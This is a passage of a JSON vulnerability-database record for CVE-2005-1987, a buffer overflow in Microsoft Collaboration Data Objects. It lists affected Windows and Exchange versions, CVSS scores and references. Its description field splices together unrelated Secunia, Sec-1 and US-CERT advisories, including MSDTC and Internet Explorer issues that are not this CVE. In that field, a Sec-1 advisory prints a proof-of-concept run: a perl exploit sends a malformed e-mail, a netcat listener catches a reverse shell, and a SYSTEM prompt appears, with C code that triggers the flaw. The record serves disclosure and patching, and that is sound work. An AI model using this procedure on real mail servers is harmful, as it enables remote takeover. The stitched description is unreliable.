            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp media center edition sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp media center edition",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp home sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp home sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp home",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server web edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server web edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "windows server standard edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition itanium sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition itanium",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20030"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition itanium sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition itanium",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20030"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows datacenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "iis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "iis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "iis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "exchange server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "exchange server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "exchange server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#680526"
          },
          {
            "db": "CERT/CC",
            "id": "VU#995220"
          },
          {
            "db": "CERT/CC",
            "id": "VU#883460"
          },
          {
            "db": "CERT/CC",
            "id": "VU#740372"
          },
          {
            "db": "CERT/CC",
            "id": "VU#950516"
          },
          {
            "db": "CERT/CC",
            "id": "VU#939605"
          },
          {
            "db": "BID",
            "id": "15067"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200510-082"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000592"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-1987"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:microsoft:exchange_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_2000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_xp",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000592"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Gary O\u0027leary-Steele  garyo@sec-1.com",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200510-082"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2005-1987",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2005-1987",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2005-1987",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#680526",
                "trust": 0.8,
                "value": "28.35"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#995220",
                "trust": 0.8,
                "value": "14.70"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#883460",
                "trust": 0.8,
                "value": "10.13"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#740372",
                "trust": 0.8,
                "value": "10.13"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#950516",
                "trust": 0.8,
                "value": "28.10"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#939605",
                "trust": 0.8,
                "value": "44.55"
              },
              {
                "author": "NVD",
                "id": "CVE-2005-1987",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200510-082",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#680526"
          },
          {
            "db": "CERT/CC",
            "id": "VU#995220"
          },
          {
            "db": "CERT/CC",
            "id": "VU#883460"
          },
          {
            "db": "CERT/CC",
            "id": "VU#740372"
          },
          {
            "db": "CERT/CC",
            "id": "VU#950516"
          },
          {
            "db": "CERT/CC",
            "id": "VU#939605"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200510-082"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000592"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-1987"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string. Microsoft Internet Explorer (IE)  will attempt to use COM objects that were not intended to be used in the web browser.  This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. \nThis issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library. \n\nThe vulnerability has been reported in the following versions:\n* Windows 2000 (remote code execution)\n* Windows XP Service Pack 1 (remote code execution)\n* Windows XP Service Pack 2 (local privilege escalation)\n* Windows Server 2003 (local privilege escalation)\n* Windows Server 2003 Service Pack 1 (local privilege escalation)\n\n3) An error in the MSDTC when validating TIP (Transaction Internet\nProtocol) requests can be exploited to cause the service to stop\nresponding via a specially crafted network message. The malicious TIP\nmessage can be transferred through the affected system to another,\nwhich causes the MSDTC on both systems to stop responding. \n\nSuccessful exploitation requires that the TIP protocol is enabled for\nMSDTC. \n\nSOLUTION:\nApply patches. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n.                                 SEC-1 LTD. The vulnerability exists when \nevent sinks are used within Microsoft Exchange 2000 or Microsoft Mail\nservices to parse e-mail content. Several Content Security packages\nwere identified to be vulnerable/exploitable. \n\nThe vulnerability can be exploited by crafting an e-mail with a large \nheader name such as \"Content-Type\u003cLARGE STRING\u003e:\". \nA failure to correctly determine the length of the string results in a\nstack overflow. Under \ncertain conditions the vulnerability can also be used to bypass content\nsecurity mechanisms such as virus and content security scanners. Proof\nof\nconcept code to recreate the problem is included at the bottom of this \nadvisory. \n\n\nExploit Availability:\n\nSec-1 do not release exploit code to the general public. \nAttendees of the Sec-1 Applied Hacking \u0026 Intrusion prevention course \nwill receive a copy of this exploit as part of the Sec-1 Exploit\nArsenal. \nSee: http://www.sec-1.com/applied_hacking_course.html\n\n\nExploit Example:\n\n[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53\n\nEnter IP address of your attacking host: 10.0.0.200\nEnter Port for shellcode to connect back on: 80\n\n[*]----Connected OK!\n[*]----Sending MAIL FROM: me@test.com\n[*]----Sending RCPT TO: \u003cme@test.com\u003e\n[*]----Sending Malformed E-mail body\n[*]----Shellcode Length: 316\n[*]----Shellcode type: Reverse shell\n[*]----Done. \n\n[!]\tNote this may take a while. Inetinfo will crash and restart\n\tThis will happen until a nops are reached. You may also want \n\tto clear the queue to restore Inetinfo.exe by deleting malformed\n\n\te-mail from c:\\Inetpub\\mailroot\\Queue\n\n[root@homer PoC]# nc -l -p 80 -v\nlistening on [any] 80 ... \n\n10.0.0.53: inverse host lookup failed: Unknown host\nconnect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100\nMicrosoft Windows 2000 [Version 5.00.2195]\n(C) Copyright 1985-2000 Microsoft Corp. \n\n\nC:\\WINNT\\system32\u003ec:\\whoami\nNT AUTHORITY\\SYSTEM\n\nC:\\WINNT\\system32\u003e\n\n\nVendor Response:\n\nMicrosoft have released the following information including a fix,\nhttp://www.microsoft.com/technet/security/bulletin/MS05-048.mspx\n\n\nCommon Vulnerabilities and Exposures (CVE) Information:\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned \nthe following names to these issues.  These are candidates for \ninclusion in the CVE list (http://cve.mitre.org), which standardizes \nnames for security problems. \n\n\t\tCAN-2005-1987\n\n\nDemonstration:\n\nThe following CDO code demonstrates the problem. \n\nStep 1. \n\nCreate an E-mail named vuln.eml including a large \"Content-Type:\"\nheader. \n\nStep 2. \n\n// Compile with -GX option\n#import \u003cmsado15.dll\u003e no_namespace rename(\"EOF\", \"adoEOF\")\n#import \u003ccdosys.dll\u003e rename_namespace(\"CDO\")\n\n#include \u003cstdio.h\u003e\n\nint main()\n{\n\nCoInitialize(0);\ntry\n{\n CDO::IMessagePtr spMsg(__uuidof(CDO::Message));\n _StreamPtr spStream(spMsg-\u003eGetStream());\n spStream-\u003ePosition = 0;\n spStream-\u003eType = adTypeBinary;\n spStream-\u003eLoadFromFile(\"vuln.eml\");\n spStream-\u003eFlush();\n\n  for(long i = 1; i \u003c= spMsg-\u003eBodyPart-\u003eBodyParts-\u003eCount; i++)\n  {\n\tCDO::IBodyPartPtr spBdy = spMsg-\u003eBodyPart-\u003eBodyParts-\u003eItem[i];\n\t_variant_t v =\nspBdy-\u003eFields-\u003eItem[\"urn:schemas:mailheader:Content-Type\"]-\u003eValue;\n  }\n\n}\n  catch(_com_error \u0026e)\n\t{\n\tprintf(\"COM error[0x%X, %s]\\n\", e.Error(),\n(LPCTSTR)e.Description());\n\t}\n\tcatch(...)\n\t{\n\tprintf(\"General exception\\n\");\n\t}\n\n\tCoUninitialize();\n\n\treturn 0;\n}\n\n\tCDO::IBodyPartPtr spBdy = spMsg-\u003eBodyPart-\u003eBodyParts-\u003eItem[i];\n\t_variant_t v =\nspBdy-\u003eFields-\u003eItem[\"urn:schemas:mailheader:Content-Type\"]-\u003eValue;\n\n\nCopyright 2005 Sec-1 LTD. All rights reserved. \n**************************************************************\nNEW: Sec-1 Hacking Training - Learn to breach network security \nto further your knowledge and protect your network \nhttp://www.sec-1.com/applied_hacking_course.html\n**************************************************************\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n            Technical Cyber Security Alert TA05-284A \n  Microsoft Windows, Internet Explorer, and Exchange Server\n  Vulnerabilities\n\n   Original release date: October 11, 2005\n   Last revised: --\n   Source: US-CERT\n\nSystems Affected\n\n     * Microsoft Windows\n     * Microsoft Internet Explorer\n     * Microsoft Exchange Server\n\n   For more complete information, refer to the Microsoft Security\n   Bulletin Summary for October 2005. \n\nOverview\n\n   Microsoft has released updates that address critical vulnerabilities\n   in Windows, Internet Explorer, and Exchange Server. \n\nI. Description\n\n   Microsoft Security Bulletins for October 2005 address vulnerabilities\n   in Windows and Internet Explorer. Further information is available in\n   the following US-CERT Vulnerability Notes:\n\n\n   VU#214572 - Microsoft Plug and Play fails to properly validate user\n   supplied data \n\n   Microsoft Plug and Play contains a flaw in the handling of message\n   buffers that may result in local or remote arbitrary code execution or\n   denial-of-service conditions. \n   (CAN-2005-1987)\n\n\n   VU#922708 - Microsoft Windows Shell fails to handle shortcut files\n   properly \n\n   Microsoft Windows Shell does not properly handle some shortcut files\n   and may permit arbitrary code execution when a specially-crafted file\n   is opened. \n   (CAN-2005-0163)\n\nII. An attacker may also be able to cause a\n   denial of service. \n\nIII. Solution\n\nApply Updates\n\n   Microsoft has provided the updates for these vulnerabilities in the\n   Security Bulletins and on the Microsoft Update site. \n\nWorkarounds\n\n   Please see the following US-CERT Vulnerability Notes for workarounds. \n\nAppendix A. References\n\n     * Microsoft Security Bulletin Summary for October 2005 -\n       \u003chttp://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx\u003e\n\n     * US-CERT Vulnerability Note VU#214572 -\n       \u003chttp://www.kb.cert.org/vuls/id/214572\u003e\n\n     * US-CERT Vulnerability Note VU#883460 -\n       \u003chttp://www.kb.cert.org/vuls/id/883460\u003e\n\n     * US-CERT Vulnerability Note VU#922708 -\n       \u003chttp://www.kb.cert.org/vuls/id/922708\u003e\n\n     * US-CERT Vulnerability Note VU#995220 -\n       \u003chttp://www.kb.cert.org/vuls/id/995220\u003e\n\n     * US-CERT Vulnerability Note VU#180868 -\n       \u003chttp://www.kb.cert.org/vuls/id/180868\u003e\n\n     * US-CERT Vulnerability Note VU#950516 -\n       \u003chttp://www.kb.cert.org/vuls/id/950516\u003e\n\n     * US-CERT Vulnerability Note VU#959049 -\n       \u003chttp://www.kb.cert.org/vuls/id/959049\u003e\n\n     * US-CERT Vulnerability Note VU#680526 -\n       \u003chttp://www.kb.cert.org/vuls/id/680526\u003e\n\n     * CAN-2005-2120 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120\u003e\n\n     * CAN-2005-1987 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987\u003e\n\n     * CAN-2005-2122 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122\u003e\n\n     * CAN-2005-2128 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128\u003e\n\n     * CAN-2005-2119 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119\u003e\n\n     * CAN-2005-1978 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978\u003e\n\n     * CAN-2005-2127 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127\u003e\n\n     * CAN-2005-0163 -\n       \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163\u003e\n\n     * Microsoft Update - \u003chttps://update.microsoft.com/microsoftupdate\u003e\n\n\n  _________________________________________________________________\n\n   The most recent version of this document can be found at:\n\n   \u003chttp://www.us-cert.gov/cas/techalerts/TA05-284A.html\u003e \n  _________________________________________________________________\n\n   Feedback can be directed to US-CERT.  Please send email to:\n   \u003ccert@cert.org\u003e with \"TA05-284A Feedback VU#959049\" in the subject. \n  _________________________________________________________________\n\n   Revision History\n\n   Oct 11, 2004: Initial release\n  _________________________________________________________________\n\n   Produced 2005 by US-CERT, a government organization. \n  \n   Terms of use\n\n   \u003chttp://www.us-cert.gov/legal.html\u003e\n  _________________________________________________________________\n\n   For instructions on subscribing to or unsubscribing from this \n   mailing list, visit \u003chttp://www.us-cert.gov/cas/\u003e. \n\n\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc\nbqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK\nPdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c\n1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe\n/9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM\nMUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog==\n=5hXu\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-1987"
          },
          {
            "db": "CERT/CC",
            "id": "VU#680526"
          },
          {
            "db": "CERT/CC",
            "id": "VU#995220"
          },
          {
            "db": "CERT/CC",
            "id": "VU#883460"
          },
          {
            "db": "CERT/CC",
            "id": "VU#740372"
          },
          {
            "db": "CERT/CC",
            "id": "VU#950516"
          },
          {
            "db": "CERT/CC",
            "id": "VU#939605"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000592"
          },
          {
            "db": "BID",
            "id": "15067"
          },
          {
            "db": "PACKETSTORM",
            "id": "40623"
          },
          {
            "db": "PACKETSTORM",
            "id": "40726"
          },
          {
            "db": "PACKETSTORM",
            "id": "40674"
          },
          {
            "db": "PACKETSTORM",
            "id": "40619"
          }
        ],
        "trust": 6.57
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#883460",
            "trust": 3.3
          },
          {
            "db": "NVD",
            "id": "CVE-2005-1987",
            "trust": 3.0
          },
          {
            "db": "BID",
            "id": "15067",
            "trust": 2.7
          },
          {
            "db": "USCERT",
            "id": "TA05-284A",
            "trust": 2.5
          },
          {
            "db": "SECUNIA",
            "id": "17167",
            "trust": 2.4
          },
          {
            "db": "CERT/CC",
            "id": "VU#959049",
            "trust": 1.7
          },
          {
            "db": "CERT/CC",
            "id": "VU#680526",
            "trust": 1.7
          },
          {
            "db": "CERT/CC",
            "id": "VU#740372",
            "trust": 1.6
          },
          {
            "db": "CERT/CC",
            "id": "VU#939605",
            "trust": 1.6
          },
          {
            "db": "SECTRACK",
            "id": "1015038",
            "trust": 1.6
          },
          {
            "db": "SECTRACK",
            "id": "1015039",
            "trust": 1.6
          },
          {
            "db": "OSVDB",
            "id": "19905",
            "trust": 1.6
          },
          {
            "db": "CERT/CC",
            "id": "VU#995220",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17161",
            "trust": 0.9
          },
          {
            "db": "CERT/CC",
            "id": "VU#950516",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "16373",
            "trust": 0.8
          },
          {
            "db": "BID",
            "id": "14594",
            "trust": 0.8
          },
          {
            "db": "XF",
            "id": "21895",
            "trust": 0.8
          },
          {
            "db": "SECTRACK",
            "id": "1014727",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "16480",
            "trust": 0.8
          },
          {
            "db": "OSVDB",
            "id": "19902",
            "trust": 0.8
          },
          {
            "db": "XF",
            "id": "22473",
            "trust": 0.8
          },
          {
            "db": "BID",
            "id": "15057",
            "trust": 0.8
          },
          {
            "db": "XF",
            "id": "21193",
            "trust": 0.8
          },
          {
            "db": "BID",
            "id": "14087",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "15891",
            "trust": 0.8
          },
          {
            "db": "OSVDB",
            "id": "17680",
            "trust": 0.8
          },
          {
            "db": "SECTRACK",
            "id": "1014329",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000592",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200510-082",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "40623",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "40726",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "40674",
            "trust": 0.1
          },
          {
            "db": "CERT/CC",
            "id": "VU#180868",
            "trust": 0.1
          },
          {
            "db": "CERT/CC",
            "id": "VU#214572",
            "trust": 0.1
          },
          {
            "db": "CERT/CC",
            "id": "VU#922708",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "40619",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#680526"
          },
          {
            "db": "CERT/CC",
            "id": "VU#995220"
          },
          {
            "db": "CERT/CC",
            "id": "VU#883460"
          },
          {
            "db": "CERT/CC",
            "id": "VU#740372"
          },
          {
            "db": "CERT/CC",
            "id": "VU#950516"
          },
          {
            "db": "CERT/CC",
            "id": "VU#939605"
          },
          {
            "db": "BID",
            "id": "15067"
          },
          {
            "db": "PACKETSTORM",
            "id": "40623"
          },
          {
            "db": "PACKETSTORM",
            "id": "40726"
          },
          {
            "db": "PACKETSTORM",
            "id": "40674"
          },
          {
            "db": "PACKETSTORM",
            "id": "40619"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200510-082"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000592"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-1987"
          }
        ]
      },
      "id": "VAR-200510-0005",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2026-04-10T22:24:42.611000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "MS05-048",
            "trust": 0.8,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms05-048.mspx"
          },
          {
            "title": "MS05-048",
            "trust": 0.8,
            "url": "http://www.microsoft.com/japan/technet/security/bulletin/ms05-048.mspx"
          },
          {
            "title": "Microsoft Windows  and Microsoft Exchange Server Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113625"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200510-082"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000592"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-1987"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.4,
            "url": "http://www.us-cert.gov/cas/techalerts/ta05-284a.html"
          },
          {
            "trust": 2.4,
            "url": "http://www.securityfocus.com/bid/15067"
          },
          {
            "trust": 2.4,
            "url": "http://www.kb.cert.org/vuls/id/883460"
          },
          {
            "trust": 1.6,
            "url": "http://www.kb.cert.org/vuls/id/959049"
          },
          {
            "trust": 1.6,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx"
          },
          {
            "trust": 1.6,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx"
          },
          {
            "trust": 1.6,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1420"
          },
          {
            "trust": 1.6,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1201"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/17167"
          },
          {
            "trust": 1.6,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a848"
          },
          {
            "trust": 1.6,
            "url": "http://securitytracker.com/id?1015038"
          },
          {
            "trust": 1.6,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
          },
          {
            "trust": 1.6,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1515"
          },
          {
            "trust": 1.6,
            "url": "http://securitytracker.com/id?1015039"
          },
          {
            "trust": 1.6,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1406"
          },
          {
            "trust": 1.6,
            "url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
          },
          {
            "trust": 1.6,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a581"
          },
          {
            "trust": 1.6,
            "url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
          },
          {
            "trust": 1.6,
            "url": "http://www.osvdb.org/19905"
          },
          {
            "trust": 1.6,
            "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
          },
          {
            "trust": 1.6,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1130"
          },
          {
            "trust": 1.0,
